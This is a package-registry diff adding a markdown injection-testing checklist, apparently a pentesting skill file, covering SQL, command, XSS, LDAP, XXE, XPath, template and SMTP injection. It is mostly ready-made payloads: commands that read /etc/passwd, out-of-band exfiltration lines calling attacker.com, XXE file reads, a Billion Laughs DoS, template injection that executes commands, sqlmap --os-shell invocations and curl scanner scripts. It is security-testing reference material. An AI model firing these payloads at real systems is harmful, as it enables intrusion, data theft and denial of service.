@soulofzephir/pi-skill-pentesting 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,456 @@
1
+ # Injection Testing Checklist
2
+
3
+ ## 🚨 Types of Injection
4
+
5
+ | Type | Target | Risk |
6
+ |------|--------|------|
7
+ | SQL Injection | Database | Critical |
8
+ | XSS | Users/Browser | High |
9
+ | Command Injection | OS/Server | Critical |
10
+ | LDAP Injection | Directory | High |
11
+ | XML/XXE | XML Parser | High |
12
+ | XPath Injection | XML Data | Medium |
13
+ | IMAP Injection | Email Server | Medium |
14
+ | ORM Injection | Framework | High |
15
+ | Template Injection | Template Engine | Critical |
16
+ | SSTI | Server Template | Critical |
17
+
18
+ ---
19
+
20
+ ## 💉 SQL Injection (SQLi)
21
+
22
+ ### Types to Test
23
+ - [ ] In-Band SQLi (Union-based)
24
+ - [ ] Blind Boolean-based SQLi
25
+ - [ ] Time-based Blind SQLi
26
+ - [ ] Out-of-Band SQLi
27
+ - [ ] Error-based SQLi
28
+
29
+ ### Common Injection Points
30
+ ```
31
+ URL parameters: /product?id=1' OR '1'='1
32
+ POST body: username=' OR 1=1--
33
+ Headers: Cookie: id=1'
34
+ Search: q=test' UNION SELECT...
35
+ API params: /api/users?id=1
36
+ File params: avatar=' OR 1=1--
37
+ ```
38
+
39
+ ### Test Payloads
40
+
41
+ **Basic Detection:**
42
+ ```
43
+ '
44
+ "
45
+ `
46
+ )
47
+ ))
48
+ OR 1=1
49
+ OR '1'='1
50
+ OR 1=1--
51
+ OR 1=1#
52
+ OR '1'='1'--
53
+ ```
54
+
55
+ **Union-Based:**
56
+ ```
57
+ ' UNION SELECT NULL--
58
+ ' UNION SELECT NULL,NULL--
59
+ ' UNION SELECT NULL,NULL,NULL--
60
+ ' UNION SELECT 1--
61
+ ' UNION SELECT 1,2,3--
62
+ ' UNION SELECT NULL,NULL FROM dual--
63
+ ```
64
+
65
+ **Stacking:**
66
+ ```
67
+ '; SELECT SLEEP(5);--
68
+ '; WAITFOR DELAY '0:0:5';--
69
+ ```
70
+
71
+ **Blind Boolean:**
72
+ ```
73
+ ' AND 1=1--
74
+ ' AND 1=2--
75
+ ' AND 'x'='x
76
+ ' AND 'x'='y
77
+ ' OR (SELECT COUNT(*) FROM users)>0--
78
+ ```
79
+
80
+ **Time-Based:**
81
+ ```
82
+ '; IF(1=1) WAITFOR DELAY '0:0:5'--
83
+ '; SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END--
84
+ '; pg_sleep(5)--
85
+ '; BENCHMARK(5000000,MD5('A'))--
86
+ ```
87
+
88
+ ### Auto Tools
89
+ ```bash
90
+ # SQLMap basic
91
+ sqlmap -u "http://target.com/product?id=1" --batch
92
+
93
+ # SQLMap with POST
94
+ sqlmap -u "http://target.com/login" --data="username=admin&password=test"
95
+
96
+ # SQLMap with cookies
97
+ sqlmap -u "http://target.com/profile" --cookie="PHPSESSID=abc123"
98
+
99
+ # SQLMap full enumeration
100
+ sqlmap -u "http://target.com" --batch --level=5 --risk=3 --dbs
101
+
102
+ # SQLMap shell
103
+ sqlmap -u "http://target.com" --batch --os-shell
104
+ ```
105
+
106
+ ---
107
+
108
+ ## 🖥️ Command Injection
109
+
110
+ ### Test Payloads
111
+
112
+ **Linux:**
113
+ ```bash
114
+ ; whoami
115
+ ; ls -la /
116
+ ; cat /etc/passwd
117
+ ; id
118
+ ; pwd
119
+ ; uname -a
120
+ | whoami
121
+ | cat /etc/passwd
122
+ && whoami
123
+ `whoami`
124
+ $(whoami)
125
+ ${IFS}cat${IFS}/etc/passwd
126
+ || whoami
127
+ ; ping -c 3 127.0.0.1
128
+ ```
129
+
130
+ **Windows:**
131
+ ```cmd
132
+ ; whoami
133
+ ; dir c:\
134
+ ; type c:\windows\win.ini
135
+ | whoami
136
+ & whoami
137
+ && whoami
138
+ || whoami
139
+ `whoami`
140
+ ```
141
+
142
+ **Blind Command Injection:**
143
+ ```bash
144
+ # Linux - time-based
145
+ ; sleep 5
146
+ | sleep 5
147
+ && sleep 5
148
+ || sleep 5
149
+
150
+ # Linux - out-of-band
151
+ ; nslookup $(whoami).attacker.com
152
+ ; curl http://attacker.com/$(whoami)
153
+
154
+ # Windows - time-based
155
+ ; ping -n 5 127.0.0.1
156
+ ```
157
+
158
+ ### Common Injection Points
159
+ ```
160
+ Search: ?q=test;ls
161
+ Ping: ?host=127.0.0.1;cat /etc/passwd
162
+ DNS: ?domain=example.com;id
163
+ Email: ?to=test@x.com|id
164
+ File: ?file=report.pdf;whoami
165
+ URL: /redirect?url=http://evil.com
166
+ ```
167
+
168
+ ### Auto Tools
169
+ ```bash
170
+ # Commix
171
+ commix -u "http://target.com/ping?ip=127.0.0.1"
172
+
173
+ # SQLMap command injection mode
174
+ sqlmap -u "http://target.com" --os-cmd="whoami"
175
+
176
+ # Manual
177
+ # Try: 127.0.0.1;ls
178
+ # Try: 127.0.0.1|ls
179
+ # Try: 127.0.0.1&&ls
180
+ # Try: 127.0.0.1`ls`
181
+ # Try: 127.0.0.1$(ls)
182
+ ```
183
+
184
+ ---
185
+
186
+ ## 🐙 XSS (Cross-Site Scripting)
187
+
188
+ ### Types
189
+ - [ ] Reflected XSS
190
+ - [ ] Stored/Persistent XSS
191
+ - [ ] DOM-based XSS
192
+ - [ ] Self-XSS
193
+ - [ ] Blind XSS (PolyChain)
194
+
195
+ ### Test Payloads
196
+
197
+ **Basic:**
198
+ ```html
199
+ <script>alert(1)</script>
200
+ <img src=x onerror=alert(1)>
201
+ <svg onload=alert(1)>
202
+ <body onload=alert(1)>
203
+ <input onfocus=alert(1) autofocus>
204
+ <select onfocus=alert(1) autofocus>
205
+ <iframe src="javascript:alert(1)">
206
+ <video><source onerror="alert(1)">
207
+ <audio src=x onerror=alert(1)>
208
+ <details open ontoggle=alert(1)>
209
+ <marquee onstart=alert(1)>
210
+ ```
211
+
212
+ **Event Handlers:**
213
+ ```html
214
+ onload, onerror, onclick
215
+ onmouseover, onmouseout
216
+ onfocus, onblur
217
+ onchange, onsubmit
218
+ onkeydown, onkeyup, onkeypress
219
+ ondblclick, ondrag
220
+ ```
221
+
222
+ **WAF Bypass:**
223
+ ```html
224
+ <SCRIPT>alert(1)</SCRIPT>
225
+ <scrIPT>alert(1)</scrIPT>
226
+ <ScRiPt>alert(1)</sCrIpT>
227
+ <img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">
228
+ <svg><script>alert(1)</script></svg>
229
+ <svg><g/onload=alert(1)>
230
+ <svg><script>eval('alert(1)')</script></svg>
231
+ <iframe src="javasc&#114;ipt:alert(1)">
232
+ <img src=x:alert(1)>
233
+ <object data="data:text/html,<script>alert(1)</script>">
234
+ ```
235
+
236
+ **Polyglots:**
237
+ ```html
238
+ jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert(1) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1)//>\x3e
239
+ --></title></textarea></style></script></xmp>><svg/onload=alert(1)//
240
+ '">><marquee><img src=x onerror=alert(1)>
241
+ ```
242
+
243
+ **DOM XSS:**
244
+ ```javascript
245
+ location.href="javascript:alert(1)"
246
+ document.write("<img src=x onerror=alert(1)>")
247
+ eval("alert(1)")
248
+ setTimeout("alert(1)")
249
+ setInterval("alert(1)")
250
+ innerHTML="<img src=x onerror=alert(1)>"
251
+ ```
252
+
253
+ ### Common Injection Points
254
+ ```
255
+ URL params: /search?q=<script>
256
+ Form input: name=<script>
257
+ Comment: <img src=x onerror=>
258
+ Profile: bio=<svg onload=>
259
+ Chat: message=<script>
260
+ Email: subject=<script>
261
+ ```
262
+
263
+ ### Auto Tools
264
+ ```bash
265
+ # Dalfox (XSS scanner)
266
+ dalfox url "http://target.com/search?q=test"
267
+
268
+ # XSStrike
269
+ xsstrike -u "http://target.com/?q=test"
270
+
271
+ # Nuclei XSS templates
272
+ nmap --script=http-unsafe-output-escaping,http-cross-site-scripting target.com
273
+
274
+ # Manual browser testing required for DOM XSS
275
+ ```
276
+
277
+ ---
278
+
279
+ ## 📁 LDAP Injection
280
+
281
+ ### Test Payloads
282
+ ```
283
+ *)(objectClass=*
284
+ )(objectClass=*
285
+ *)(objectClass=*
286
+ admin)(&(password=*)
287
+ *)(|
288
+ )(CN=Admin)
289
+ *()
290
+ ```
291
+
292
+ ### Common Points
293
+ ```
294
+ Login: username=admin*)(&
295
+ Search: ?search=admin*
296
+ ```
297
+
298
+ ---
299
+
300
+ ## 📄 XML/XXE Injection
301
+
302
+ ### Test Payloads
303
+
304
+ **Basic XXE:**
305
+ ```xml
306
+ <?xml version="1.0"?>
307
+ <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
308
+ <foo>&xxe;</foo>
309
+ ```
310
+
311
+ **Blind XXE:**
312
+ ```xml
313
+ <?xml version="1.0"?>
314
+ <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">]>
315
+ <foo>&xxe;</foo>
316
+
317
+ <!-- evil.dtd on attacker.com -->
318
+ <!ENTITY xxe SYSTEM "file:///etc/passwd">
319
+ ```
320
+
321
+ **Billion Laughs (DoS):**
322
+ ```xml
323
+ <!DOCTYPE lolz [
324
+ <!ENTITY lol "lol">
325
+ <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
326
+ <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
327
+ ]>
328
+ <lolz>&lol3;</lolz>
329
+ ```
330
+
331
+ ### Common Points
332
+ ```
333
+ XML API: /api/import
334
+ SOAP API: /soap
335
+ PDF upload
336
+ Office docs upload
337
+ RSS feed
338
+ ```
339
+
340
+ ---
341
+
342
+ ## 🔍 XPath Injection
343
+
344
+ ### Test Payloads
345
+ ```
346
+ ' or '1'='1
347
+ ' or ''='
348
+ admin' or '1'='1
349
+ admin' or ''='
350
+ ' or count(/*) > 0
351
+ ' or count(/child::node()) > 0
352
+ ```
353
+
354
+ ---
355
+
356
+ ## 🗂️ Template Injection (SSTI)
357
+
358
+ ### Jinja2 (Python)
359
+ ```python
360
+ {{7*7}}
361
+ {{config}}
362
+ {{config.items()}}
363
+ {{''.__class__.__mro__[1].__subclasses__()}}
364
+ {{lipsum.__globals__.__builtins__}}
365
+ {{cycler.__init__.__globals__.os.system('id')}}
366
+ ```
367
+
368
+ ### Twig (PHP)
369
+ ```php
370
+ {{7*7}}
371
+ {{_self.env.setCache("blabla")}}
372
+ {{_self.env.getLoader().getPaths()}}
373
+ {{_self.env.getLoader().getPaths()|escape}}
374
+ ```
375
+
376
+ ### Handlebars (Node.js)
377
+ ```javascript
378
+ {{#with "a"}}{{#with "b"}}{{#with "c"}}{{#with "d"}}{{#with (eval "require('child_process').execSync('id')")}}{{this}}{{/with}}{{/with}}{{/with}}{{/with}}{{/with}}
379
+ ```
380
+
381
+ ---
382
+
383
+ ## 📧 IMAP/SMTP Injection
384
+
385
+ ### Test Payloads
386
+ ```
387
+ user@domain.com%0ACc:attacker@evil.com
388
+ user@domain.com%0ATo:attacker@evil.com
389
+ user@domain.com%0ASubject:Phishing
390
+ user@domain.com\r\n\r\nPhishing body
391
+ ```
392
+
393
+ ---
394
+
395
+ ## 🛡️ Injection Prevention Checklist
396
+
397
+ - [ ] Input validation (whitelist)
398
+ - [ ] Parameterized queries (prepared statements)
399
+ - [ ] Output encoding/escaping
400
+ - [ ] Content Security Policy
401
+ - [ ] ORM usage (not raw SQL)
402
+ - [ ] No eval() on user input
403
+ - [ ] XML parser secure config
404
+ - [ ] Command execution sandboxed
405
+ - [ ] WAF rules for common payloads
406
+ - [ ] Regular security testing
407
+
408
+ ---
409
+
410
+ ## ⚡ Quick Test Scripts
411
+
412
+ ### SQLi Quick Check
413
+ ```bash
414
+ #!/bin/bash
415
+ TARGET=$1
416
+ echo "Testing SQLi on: $TARGET"
417
+
418
+ # Basic test
419
+ PAYLOADS=("'" "' OR '1'='1" "' OR 1=1--" "' UNION SELECT NULL--")
420
+
421
+ for p in "${PAYLOADS[@]}"; do
422
+ RESPONSE=$(curl -s "${TARGET}${p}" | grep -iE "sql|syntax|mysql|postgresql|error|warning|mysql_fetch")
423
+ if [ ! -z "$RESPONSE" ]; then
424
+ echo "⚠️ VULNERABLE with payload: $p"
425
+ echo " Response: $RESPONSE"
426
+ fi
427
+ done
428
+ ```
429
+
430
+ ### XSS Quick Check
431
+ ```bash
432
+ #!/bin/bash
433
+ TARGET=$1
434
+ PAYLOAD="<script>alert('XSS')</script>"
435
+
436
+ echo "Testing XSS on: $TARGET"
437
+ curl -s "${TARGET}${PAYLOAD}" | grep -q "alert" && echo "⚠️ Reflected XSS possible"
438
+
439
+ # Also test with different encoding
440
+ PAYLOAD2="<img src=x onerror=alert(1)>"
441
+ curl -s "${TARGET}${PAYLOAD2}" | grep -q "alert" && echo "⚠️ Event handler XSS"
442
+ ```
443
+
444
+ ---
445
+
446
+ ## 📊 Injection Risk Matrix
447
+
448
+ | Type | Difficulty to Exploit | Impact | Prevalence |
449
+ |------|----------------------|--------|------------|
450
+ | SQLi | Medium | Critical | Common |
451
+ | Command Injection | Easy | Critical | Common |
452
+ | XSS | Easy | High | Very Common |
453
+ | XXE | Medium | High | Common |
454
+ | LDAP Injection | Medium | High | Less Common |
455
+ | SSTI | Medium | Critical | Less Common |
456
+ | XPath | Medium | Medium | Less Common |